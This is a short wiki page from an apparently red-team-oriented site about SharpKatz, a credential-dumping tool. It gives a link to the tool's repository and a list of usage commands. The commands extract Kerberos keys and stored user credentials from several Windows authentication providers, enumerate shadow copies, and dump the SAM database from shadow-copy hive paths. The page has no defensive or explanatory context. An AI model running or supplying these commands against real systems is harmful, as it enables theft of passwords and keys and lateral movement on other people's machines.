SharpKatz

From RCATs
Revision as of 05:03, 21 August 2023 by Ali3nw3rx (talk | contribs) (Created page with "== Links == <syntaxhighlight lang="powershell"> https://github.com/b4rtik/SharpKatz </syntaxhighlight> == Usage == <syntaxhighlight lang="powershell"> #list Kerberos encryption keys SharpKatz.exe --Command ekeys #Retrive user credentials from Msv provider SharpKatz.exe --Command msv #Retrive user credentials from Kerberos provider SharpKatz.exe --Command kerberos #Retrive user credentials from Tspkg provider SharpKatz.exe --Command tspkg #Retrive user credentials fr...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Links

https://github.com/b4rtik/SharpKatz

Usage

#list Kerberos encryption keys
SharpKatz.exe --Command ekeys

#Retrive user credentials from Msv provider
SharpKatz.exe --Command msv

#Retrive user credentials from Kerberos provider
SharpKatz.exe --Command kerberos

#Retrive user credentials from Tspkg provider
SharpKatz.exe --Command tspkg

#Retrive user credentials from Credman provider
SharpKatz.exe --Command Credman

#Retrive user credentials from WDigest provider
SharpKatz.exe --Command wdigest

#Retrive user credentials from all providers
SharpKatz.exe --Command logonpasswords

#Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject
SharpKatz.exe --Command listshadows

#Dump credential from provided sam database
SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM
Retrieved from "https://rcats.dev/rcats/index.php?title=SharpKatz&oldid=921"